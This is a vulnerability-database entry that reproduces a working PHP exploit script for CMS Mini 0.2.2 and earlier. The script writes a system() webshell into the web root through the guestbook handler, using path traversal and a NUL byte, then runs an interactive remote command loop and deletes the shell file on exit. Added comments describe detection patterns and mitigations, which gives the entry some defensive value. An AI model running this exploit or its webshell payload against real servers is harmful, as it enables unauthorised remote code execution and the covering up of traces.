seebugRootSSV:66258
HistoryJul 01, 2014 - 12:00 a.m.

CMS Mini <= 0.2.2 - Remote Command Execution Exploit

2014-07-01 00:00:00
Root
www.seebug.org
14

No description provided by source.


                                                --+++================================================================+++--
--+++====== CMS Mini <= 0.2.2 Remote Command Execution Exploit ======+++--
--+++================================================================+++--

&#60;?php

/**
 * Print the tool's banner and command-line usage, then stop the script.
 *
 * The whole banner is passed to exit() as a single concatenated string, so
 * PHP outputs it and terminates. Takes no arguments and does not return.
 */
function usage ()
{
	exit (
		&#34;\nCMS Mini &#60;= 0.2.2 Remote Command Execution Exploit&#34;.
		&#34;\n[+] Author  : darkjoker&#34;.
		&#34;\n[+] Site    : http://darkjoker.net23.net&#34;.
		&#34;\n[+] Download: http://ovh.dl.sourceforge.net/sourceforge/cmsmini/cmsmini-0.2.2.tar.gz&#34;.
		&#34;\n[+] Usage   : php xpl.php &#60;hostname&#62; &#60;path&#62;&#34;.
		&#34;\n[+] Ex.     : php xpl.php localhost /CMSmini&#34;.
		&#34;\n\n&#34;);
}

// Defender's summary: this proof of concept shows that the CMS Mini <= 0.2.2
// guestbook handler can be made to write attacker-supplied content to a .php
// file inside the web root, which the web server then executes on request.
// No authentication step appears anywhere in the script.
//
// Detection (web server access logs):
//   - POST to view/index.php with op=guestbook, path=.. and an encoded NUL
//     (%00) in the p parameter;
//   - later GET requests to an unexpected file.php carrying a cmd= parameter.
// Mitigation: remove or replace the affected CMS Mini release, restrict the
// path/p parameters to an allowlist of known page names (rejecting "..",
// NUL bytes and executable extensions), and never store visitor-supplied text
// in files the web server will interpret as PHP. PHP 5.3.4 and later reject
// NUL bytes in filesystem paths, which blocks the truncation used here.

// Expects exactly two CLI arguments: hostname and installation path.
// NOTE(review): `usage` is written without call parentheses, so the usage()
// function defined above is not actually invoked on this line.
if ($argc != 3)
	usage;
$hostname = $argv [1];
$path = $argv [2];
// Plain TCP connection to port 80; the return value is not checked.
$fp = fsockopen ($hostname, 80);
// POST body: the `message` form field carries a short PHP snippet that passes
// the `cmd` query parameter to system(). PHP open tags arriving in a guestbook
// field are a strong indicator worth alerting on.
$post = &#34;message=&#60;? system (\$_GET [&#39;cmd&#39;]); die ();?&#62;&#34;;
// Request line: op=guestbook selects the guestbook action, path=.. steps one
// directory up, and p=file.php%00 names the target file. Presumably the
// handler appends its own suffix to `p` and the NUL byte truncates it —
// confirm against the CMS Mini source.
$request = &#34;POST {$path}/view/index.php?op=guestbook&path=..&p=file.php%00 HTTP/1.1\r\n&#34;.
	   &#34;Host: $hostname\r\n&#34;.
	   &#34;Connection: Close\r\n&#34;.
	   &#34;Content-Type: application/x-www-form-urlencoded\r\n&#34;.
	   &#34;Content-Length: &#34; . strlen ($post) . &#34;\r\n\r\n&#34;.
	   $post;
// The request is sent and the socket closed without reading the response, so
// the script never verifies whether the write succeeded.
fputs ($fp, $request);
fclose ($fp);
$stdin = fopen(&#34;php://stdin&#34;, &#34;r&#34;);
// Interactive loop: each stdin line (bounded by the 1024 length argument) is
// trimmed, has its spaces replaced with %20 (no other URL encoding is done),
// and is sent as the cmd parameter of a GET to {$path}/file.php; the response
// body is echoed to the terminal.
while (1)
{
	echo &#34;$ &#34;;
	$cmd = str_replace (&#34; &#34;, &#34;%20&#34;, trim (fgets ($stdin, 1024)));
	if ($cmd == &#34;exit&#34;)
	{
		// Typing "exit" sends one last request asking the server to delete
		// file.php. For incident response this means the dropped file may be
		// gone from disk afterwards; its absence does not rule out
		// exploitation, so rely on access logs rather than a file search.
		file_get_contents (&#34;http://{$hostname}{$path}/file.php?cmd=rm%20file.php&#34;);
		break;
	}
	echo file_get_contents (&#34;http://{$hostname}{$path}/file.php?cmd={$cmd}&#34;);
	
}
fclose ($stdin);
?&#62;

# milw0rm.com [2009-02-02]